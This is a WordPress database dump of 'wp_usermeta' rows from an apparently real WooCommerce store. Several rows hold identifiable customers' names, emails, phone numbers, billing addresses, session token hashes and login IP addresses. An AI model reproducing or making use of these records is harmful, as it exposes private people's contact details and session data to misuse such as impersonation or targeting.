INSERT INTO `wp_usermeta` VALUES (1986, 106, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1987, 106, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1988, 106, '_yoast_wpseo_profile_updated', '1477210526'); 
INSERT INTO `wp_usermeta` VALUES (1989, 106, 'session_tokens', 'a:1:{s:64:"f46b54e9dbe52bedf6f2007f85c64c814036ee4161d1bce9a312c2e7ed943cf0";a:4:{s:10:"expiration";i:1478420126;s:2:"ip";s:12:"39.48.86.189";s:2:"ua";s:128:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393";s:5:"login";i:1477210526;}}'); 
INSERT INTO `wp_usermeta` VALUES (1990, 106, 'billing_first_name', 'Tahir'); 
INSERT INTO `wp_usermeta` VALUES (1991, 106, 'billing_last_name', 'Mahmood'); 
INSERT INTO `wp_usermeta` VALUES (1992, 106, 'billing_company', 'Pakistan Inernational Airlines'); 
INSERT INTO `wp_usermeta` VALUES (1993, 106, 'billing_email', 'tahir.mehmood@piac.aero'); 
INSERT INTO `wp_usermeta` VALUES (1994, 106, 'billing_phone', '+92 (0) 3002018787'); 
INSERT INTO `wp_usermeta` VALUES (1995, 106, 'billing_country', 'PK'); 
INSERT INTO `wp_usermeta` VALUES (1996, 106, 'billing_address_1', 'Ispahani Hanger'); 
INSERT INTO `wp_usermeta` VALUES (1997, 106, 'billing_address_2', 'Engineering & Maintenance Head Office Building'); 
INSERT INTO `wp_usermeta` VALUES (1998, 106, 'billing_city', 'Karachi'); 
INSERT INTO `wp_usermeta` VALUES (1999, 106, 'billing_state', 'Pakistan'); 
INSERT INTO `wp_usermeta` VALUES (2000, 106, 'billing_postcode', '75000'); 
INSERT INTO `wp_usermeta` VALUES (2001, 106, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2002, 107, 'nickname', 'pnowell'); 
INSERT INTO `wp_usermeta` VALUES (2003, 107, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2004, 107, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2005, 107, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2006, 107, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2007, 107, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2008, 107, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2009, 107, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2010, 107, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2011, 107, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2012, 107, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2013, 107, '_yoast_wpseo_profile_updated', '1477315492'); 
INSERT INTO `wp_usermeta` VALUES (2014, 107, 'session_tokens', 'a:1:{s:64:"1ce2782784bc4e4aef74827ce26e7820d43f5e02c448188626a5659035c0cf4b";a:4:{s:10:"expiration";i:1503151746;s:2:"ip";s:15:"104.129.194.193";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1502978946;}}'); 
INSERT INTO `wp_usermeta` VALUES (2015, 107, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2016, 108, 'nickname', 'purchasing'); 
INSERT INTO `wp_usermeta` VALUES (2017, 108, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2018, 108, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2019, 108, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2020, 108, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2021, 108, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2022, 108, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2023, 108, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2024, 108, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2025, 108, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2026, 108, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2027, 108, '_yoast_wpseo_profile_updated', '1477315888'); 
INSERT INTO `wp_usermeta` VALUES (2029, 108, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2030, 109, 'nickname', 'kkonesky'); 
INSERT INTO `wp_usermeta` VALUES (2031, 109, 'first_name', 'Kenneth'); 
INSERT INTO `wp_usermeta` VALUES (2032, 109, 'last_name', 'Konesky'); 
INSERT INTO `wp_usermeta` VALUES (2033, 109, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2034, 109, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2035, 109, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2036, 109, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2037, 109, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2038, 109, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2039, 109, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2040, 109, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2041, 109, '_yoast_wpseo_profile_updated', '1477317462'); 
INSERT INTO `wp_usermeta` VALUES (2042, 109, 'session_tokens', 'a:1:{s:64:"1f12f6bfec99e0959d63a5875fd74ca458cb419747c020d51e704ca06d93d364";a:4:{s:10:"expiration";i:1478527063;s:2:"ip";s:12:"173.248.54.2";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1477317463;}}'); 
INSERT INTO `wp_usermeta` VALUES (2043, 109, 'billing_first_name', 'Kenneth'); 
INSERT INTO `wp_usermeta` VALUES (2044, 109, 'billing_last_name', 'Konesky'); 
INSERT INTO `wp_usermeta` VALUES (2045, 109, 'billing_company', ''); 
INSERT INTO `wp_usermeta` VALUES (2046, 109, 'billing_email', 'kkonesky@ricelake.com'); 
INSERT INTO `wp_usermeta` VALUES (2047, 109, 'billing_phone', '7154345339'); 
INSERT INTO `wp_usermeta` VALUES (2048, 109, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (2049, 109, 'billing_address_1', '230 W Coleman St'); 
INSERT INTO `wp_usermeta` VALUES (2050, 109, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (2051, 109, 'billing_city', 'Rice Lake'); 
INSERT INTO `wp_usermeta` VALUES (2052, 109, 'billing_state', 'WI'); 
INSERT INTO `wp_usermeta` VALUES (2053, 109, 'billing_postcode', '54868'); 
INSERT INTO `wp_usermeta` VALUES (2054, 109, 'last_update', '1477317554'); 
INSERT INTO `wp_usermeta` VALUES (2055, 109, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2058, 110, 'nickname', 'NMCINTIRE'); 
INSERT INTO `wp_usermeta` VALUES (2059, 110, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2060, 110, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2061, 110, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2062, 110, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2063, 110, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2064, 110, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2065, 110, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2066, 110, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2067, 110, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2068, 110, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2069, 110, '_yoast_wpseo_profile_updated', '1477329245'); 
INSERT INTO `wp_usermeta` VALUES (2070, 110, 'session_tokens', 'a:1:{s:64:"24d25edf22af0879ad08ee0ac471d598030f12d669a743399ac9a7632efd35a0";a:4:{s:10:"expiration";i:1480598414;s:2:"ip";s:15:"173.162.201.213";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36";s:5:"login";i:1480425614;}}'); 
INSERT INTO `wp_usermeta` VALUES (2071, 111, 'nickname', 'cynthia'); 
INSERT INTO `wp_usermeta` VALUES (2072, 111, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2073, 111, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2074, 111, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2075, 111, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2076, 111, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2077, 111, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2078, 111, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2079, 111, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2080, 111, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2081, 111, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2082, 111, '_yoast_wpseo_profile_updated', '1477337586'); 
INSERT INTO `wp_usermeta` VALUES (2083, 111, 'session_tokens', 'a:1:{s:64:"c04482282ba2fa15d755b902a25bcca77e52a44e628f522f1e698591ee5f24ea";a:4:{s:10:"expiration";i:1478547186;s:2:"ip";s:13:"97.105.25.246";s:2:"ua";s:116:"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393";s:5:"login";i:1477337586;}}'); 
INSERT INTO `wp_usermeta` VALUES (2084, 111, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2085, 112, 'nickname', 'wonjune.hong'); 
INSERT INTO `wp_usermeta` VALUES (2086, 112, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2087, 112, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2088, 112, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2089, 112, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2090, 112, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2091, 112, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2092, 112, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2093, 112, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2094, 112, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2095, 112, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2096, 112, '_yoast_wpseo_profile_updated', '1477400011'); 
INSERT INTO `wp_usermeta` VALUES (2097, 112, 'session_tokens', 'a:1:{s:64:"8b4a72a3780caa8a5b6ba73e873165bb662ad0327725a96c4041b93cb5b7d2ec";a:4:{s:10:"expiration";i:1478609612;s:2:"ip";s:12:"192.35.35.35";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1477400012;}}'); 
INSERT INTO `wp_usermeta` VALUES (2098, 112, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2099, 113, 'nickname', 'fpereyra'); 
INSERT INTO `wp_usermeta` VALUES (2100, 113, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2101, 113, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2102, 113, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2103, 113, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2104, 113, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2105, 113, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2106, 113, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2107, 113, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2108, 113, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2109, 113, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2110, 113, '_yoast_wpseo_profile_updated', '1477406457'); 
INSERT INTO `wp_usermeta` VALUES (2111, 113, 'session_tokens', 'a:1:{s:64:"fb44a9b4c5398366947b6d5947b81e76faf16af4f5154e97d324155ca393a91c";a:4:{s:10:"expiration";i:1478616058;s:2:"ip";s:14:"190.166.108.26";s:2:"ua";s:110:"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";s:5:"login";i:1477406458;}}'); 
INSERT INTO `wp_usermeta` VALUES (2112, 113, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2113, 114, 'nickname', 'donna'); 
INSERT INTO `wp_usermeta` VALUES (2114, 114, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2115, 114, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2116, 114, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2117, 114, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2118, 114, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2119, 114, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2120, 114, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2121, 114, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2122, 114, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2123, 114, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2124, 114, '_yoast_wpseo_profile_updated', '1477408272'); 
INSERT INTO `wp_usermeta` VALUES (2126, 114, 'billing_first_name', 'Donna'); 
INSERT INTO `wp_usermeta` VALUES (2127, 114, 'billing_last_name', 'Norman'); 
INSERT INTO `wp_usermeta` VALUES (2128, 114, 'billing_company', 'GoAero, LLC'); 
INSERT INTO `wp_usermeta` VALUES (2129, 114, 'billing_email', 'donna@goaero.net'); 
INSERT INTO `wp_usermeta` VALUES (2130, 114, 'billing_phone', '3362951348'); 
INSERT INTO `wp_usermeta` VALUES (2131, 114, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (2132, 114, 'billing_address_1', '7680 Airline Road'); 
INSERT INTO `wp_usermeta` VALUES (2133, 114, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (2134, 114, 'billing_city', 'Greensboro'); 
INSERT INTO `wp_usermeta` VALUES (2135, 114, 'billing_state', 'NC'); 
INSERT INTO `wp_usermeta` VALUES (2136, 114, 'billing_postcode', '27409'); 
INSERT INTO `wp_usermeta` VALUES (2138, 115, 'nickname', 'JIN.LEE'); 
INSERT INTO `wp_usermeta` VALUES (2139, 115, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2140, 115, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2141, 115, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2142, 115, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2143, 115, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2144, 115, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2145, 115, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2146, 115, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2147, 115, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2148, 115, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2149, 115, '_yoast_wpseo_profile_updated', '1477415587'); 
INSERT INTO `wp_usermeta` VALUES (2150, 115, 'session_tokens', 'a:1:{s:64:"e2290e206181689f7b3b3c115556605c32f7d2a70e4bc8038cd2c0c19cda87ac";a:4:{s:10:"expiration";i:1478624035;s:2:"ip";s:13:"64.60.197.211";s:2:"ua";s:113:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36";s:5:"login";i:1477414435;}}'); 
INSERT INTO `wp_usermeta` VALUES (2151, 116, 'nickname', 'john.hochgurtel'); 
INSERT INTO `wp_usermeta` VALUES (2152, 116, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2153, 116, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2154, 116, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2155, 116, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2156, 116, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2157, 116, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2158, 116, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2159, 116, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2160, 116, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2161, 116, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2162, 116, '_yoast_wpseo_profile_updated', '1477414925'); 
INSERT INTO `wp_usermeta` VALUES (2163, 116, 'session_tokens', 'a:1:{s:64:"3bf7c29540083ff801bc21bd4596c7fc62adb512dd997c628fad5fd217cf4a95";a:4:{s:10:"expiration";i:1478624526;s:2:"ip";s:14:"204.128.192.33";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1477414926;}}'); 
INSERT INTO `wp_usermeta` VALUES (2164, 116, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2165, 115, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2166, 117, 'nickname', 'barbara.a.straub.mil'); 
INSERT INTO `wp_usermeta` VALUES (2167, 117, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2168, 117, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2169, 117, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2170, 117, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2171, 117, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2172, 117, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2173, 117, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2174, 117, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2175, 117, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2176, 117, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2177, 117, '_yoast_wpseo_profile_updated', '1477415514'); 
INSERT INTO `wp_usermeta` VALUES (2178, 117, 'session_tokens', 'a:1:{s:64:"6d5927a948f01d6aa505fbc80c102cf04b0a4f079acfbbae1707afac7271aac7";a:4:{s:10:"expiration";i:1478625115;s:2:"ip";s:13:"132.119.253.2";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1477415515;}}'); 
INSERT INTO `wp_usermeta` VALUES (2179, 115, 'wpseo_title', ''); 
INSERT INTO `wp_usermeta` VALUES (2180, 115, 'wpseo_metadesc', ''); 
INSERT INTO `wp_usermeta` VALUES (2181, 115, 'wpseo_metakey', ''); 
INSERT INTO `wp_usermeta` VALUES (2182, 115, 'wpseo_excludeauthorsitemap', ''); 
INSERT INTO `wp_usermeta` VALUES (2183, 115, 'wpseo_content_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (2184, 115, 'wpseo_keyword_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (2185, 115, 'billing_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2186, 115, 'billing_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2187, 115, 'billing_company', ''); 
INSERT INTO `wp_usermeta` VALUES (2188, 115, 'billing_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (2189, 115, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (2190, 115, 'billing_city', ''); 
INSERT INTO `wp_usermeta` VALUES (2191, 115, 'billing_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (2192, 115, 'billing_country', ''); 
INSERT INTO `wp_usermeta` VALUES (2193, 115, 'billing_state', ''); 
INSERT INTO `wp_usermeta` VALUES (2194, 115, 'billing_phone', ''); 
INSERT INTO `wp_usermeta` VALUES (2195, 115, 'billing_email', ''); 
INSERT INTO `wp_usermeta` VALUES (2196, 115, 'shipping_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2197, 115, 'shipping_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2198, 115, 'shipping_company', ''); 
INSERT INTO `wp_usermeta` VALUES (2199, 115, 'shipping_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (2200, 115, 'shipping_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (2201, 115, 'shipping_city', ''); 
INSERT INTO `wp_usermeta` VALUES (2202, 115, 'shipping_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (2203, 115, 'shipping_country', ''); 
INSERT INTO `wp_usermeta` VALUES (2204, 115, 'shipping_state', ''); 
INSERT INTO `wp_usermeta` VALUES (2205, 115, 'googleplus', ''); 
INSERT INTO `wp_usermeta` VALUES (2206, 115, 'twitter', ''); 
INSERT INTO `wp_usermeta` VALUES (2207, 115, 'facebook', ''); 
INSERT INTO `wp_usermeta` VALUES (2208, 115, 'last_update', '1477415587'); 
INSERT INTO `wp_usermeta` VALUES (2209, 117, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2210, 118, 'nickname', 'rstaas'); 
INSERT INTO `wp_usermeta` VALUES (2211, 118, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2212, 118, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2213, 118, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2214, 118, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2215, 118, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2216, 118, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2217, 118, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2218, 118, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2219, 118, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2220, 118, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2221, 118, '_yoast_wpseo_profile_updated', '1477417984'); 
INSERT INTO `wp_usermeta` VALUES (2222, 118, 'session_tokens', 'a:1:{s:64:"52d83e887e9b4464f5e5dca6457ad80bfeb2b8c114aae33b1c2116ddf7961c64";a:4:{s:10:"expiration";i:1478627584;s:2:"ip";s:12:"98.102.3.170";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36";s:5:"login";i:1477417984;}}'); 
INSERT INTO `wp_usermeta` VALUES (2223, 118, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2224, 119, 'nickname', 'james.d.cross'); 
INSERT INTO `wp_usermeta` VALUES (2225, 119, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2226, 119, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2227, 119, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2228, 119, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2229, 119, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2230, 119, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2231, 119, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2232, 119, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2233, 119, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2234, 119, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2235, 119, '_yoast_wpseo_profile_updated', '1477418560'); 
INSERT INTO `wp_usermeta` VALUES (2236, 119, 'session_tokens', 'a:1:{s:64:"28a3d701ddacab2e509cd7486ef09117095991a24e8ad2f89920a2d9df791f70";a:4:{s:10:"expiration";i:1478628160;s:2:"ip";s:12:"138.162.0.42";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1477418560;}}'); 
INSERT INTO `wp_usermeta` VALUES (2237, 119, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2238, 3, 'wp_yoast_notifications', 'a:1:{i:0;a:2:{s:7:"message";s:499:"We\'ve noticed you\'ve been using Yoast SEO for some time now; we hope you love it! We\'d be thrilled if you could <a href="https://yoa.st/rate-yoast-seo">give us a 5 stars rating on WordPress.org</a>!\n\nIf you are experiencing issues, <a href="https://yoa.st/bugreport">please file a bug report</a> and we\'ll do our best to help you out.\n\n\n\n<a class="button" href="https://www.miller-stephenson.com/wp-admin/?page=wpseo_dashboard&yoast_dismiss=upsell">Please don\'t show me this notification anymore</a>";s:7:"options";a:8:{s:4:"type";s:7:"warning";s:2:"id";s:19:"wpseo-upsell-notice";s:5:"nonce";N;s:8:"priority";d:0.8000000000000000444089209850062616169452667236328125;s:9:"data_json";a:0:{}s:13:"dismissal_key";N;s:12:"capabilities";s:14:"manage_options";s:16:"capability_check";s:3:"all";}}}'); 
INSERT INTO `wp_usermeta` VALUES (2239, 94, 'wpseo_title', ''); 
INSERT INTO `wp_usermeta` VALUES (2240, 94, 'wpseo_metadesc', ''); 
INSERT INTO `wp_usermeta` VALUES (2241, 94, 'wpseo_metakey', ''); 
INSERT INTO `wp_usermeta` VALUES (2242, 94, 'wpseo_excludeauthorsitemap', ''); 
INSERT INTO `wp_usermeta` VALUES (2243, 94, 'wpseo_content_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (2244, 94, 'wpseo_keyword_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (2245, 94, 'billing_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2246, 94, 'billing_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2247, 94, 'billing_company', ''); 
INSERT INTO `wp_usermeta` VALUES (2248, 94, 'billing_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (2249, 94, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (2250, 94, 'billing_city', ''); 
INSERT INTO `wp_usermeta` VALUES (2251, 94, 'billing_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (2252, 94, 'billing_country', ''); 
INSERT INTO `wp_usermeta` VALUES (2253, 94, 'billing_state', ''); 
INSERT INTO `wp_usermeta` VALUES (2254, 94, 'billing_phone', ''); 
INSERT INTO `wp_usermeta` VALUES (2255, 94, 'billing_email', ''); 
INSERT INTO `wp_usermeta` VALUES (2256, 94, 'shipping_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2257, 94, 'shipping_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2258, 94, 'shipping_company', ''); 
INSERT INTO `wp_usermeta` VALUES (2259, 94, 'shipping_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (2260, 94, 'shipping_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (2261, 94, 'shipping_city', ''); 
INSERT INTO `wp_usermeta` VALUES (2262, 94, 'shipping_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (2263, 94, 'shipping_country', ''); 
INSERT INTO `wp_usermeta` VALUES (2264, 94, 'shipping_state', ''); 
